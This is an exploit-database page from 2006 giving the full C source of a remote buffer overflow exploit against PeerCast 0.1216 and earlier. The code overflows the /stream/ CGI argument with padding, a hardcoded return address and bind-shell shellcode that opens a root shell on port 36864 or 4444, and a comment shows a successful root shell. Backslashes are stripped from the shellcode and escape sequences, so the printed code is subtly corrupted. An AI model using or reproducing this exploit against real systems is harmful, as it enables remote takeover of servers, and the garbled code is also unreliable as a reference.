PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)
# Published : 2006-03-12
# Author : darkeagle
# Previous Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
# Next Title : PeerCast <= 0.1216

/*
		PeerCast <=0.1216 remote exploit
/			by Darkeagle
	
/	09.03.06

/
	gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz.
/

/ http://unl0ck.net

*******************************************
root@localhost darkeagle]# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
uname -a;
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
*******************************************

Special tnx goes to: Dr_UF0 for targets support :)


/

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>


char scode[]= // binds 4444 port
"x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x85"
"x4fxcaxdfx83xebxfcxe2xf4xb4x94x99x9cxd6x25xc8xb5"
"xe3x17x53x56x64x82x4ax49xc6x1dxacxb7x94x13xacx8c"
"x0cxaexa0xb9xddx1fx9bx89x0cxaex07x5fx35x29x1bx3c"
"x48xcfx98x8dxd3x0cx43x3ex35x29x07x5fx16x25xc8x86"
"x35x70x07x5fxccx36x33x6fx8ex1dxa2xf0xaax3cxa2xb7"
"xaax2dxa3xb1x0cxacx98x8cx0cxaex07x5f";

char linuxshellcode[]= // binds 36864 port
	"xebx6ex5ex29xc0x89x46x10"
	"x40x89xc3x89x46x0cx40x89"	 
	"x46x08x8dx4ex08xb0x66xcd"
	"x80x43xc6x46x10x10x88x46"
	"x08x31xc0x31xd2x89x46x18"
	"xb0x90x66x89x46x16x8dx4e"
	"x14x89x4ex0cx8dx4ex08xb0"
	"x66xcdx80x89x5ex0cx43x43"
	"xb0x66xcdx80x89x56x0cx89"
	"x56x10xb0x66x43xcdx80x86"
	"xc3xb0x3fx29xc9xcdx80xb0"
	"x3fx41xcdx80xb0x3fx41xcd"
	"x80x88x56x07x89x76x0cx87"
	"xf3x8dx4bx0cxb0x0bxcdx80"
	"xe8x8dxffxffxffx2fx62x69"
	"x6ex2fx73x68";



void usage(char *proga)
{
	printf("usage> %s <ipaddr> <port>n", proga);
}

int main( int argc, char *argv[] )
{
int sock;
struct sockaddr_in addr;
char evil[1024], get[1024];

long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz


system("clear");
printf(".::: PeerCast <= 0.1215 remote exploit :::.n");
printf("                 by Darkeagle              nn");
printf(" bug founder: Leon Juranicn");
printf("n keep private!!!n");

if ( argc < 3 )
{
usage(argv[0]);
exit(0);
}

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

printf("nexp> connecting...n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
{
printf("exp> connection failedn");
exit(0);
}

printf("exp> connection enstabilished!n");

memset(evil, 0x00, 1024);
memset(get, 0x00, 1024);
memset(evil, 0x55, 800);
//memcpy(evil+strlen(evil), &scode, sizeof(scode));
memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode));

strcpy(get, "GET /stream/?");

*(long*)&evil[780] = retaddr;
strcat(evil, "rnrn");
strcat(get, evil);

sleep(1);
printf("exp> sending evil datan");
send(sock, get, strlen(get), 0);
printf("exp> done!n");
printf("exp> check shelln");
close(sock);
return 0;
}

// www.Syue.com [2006-03-12]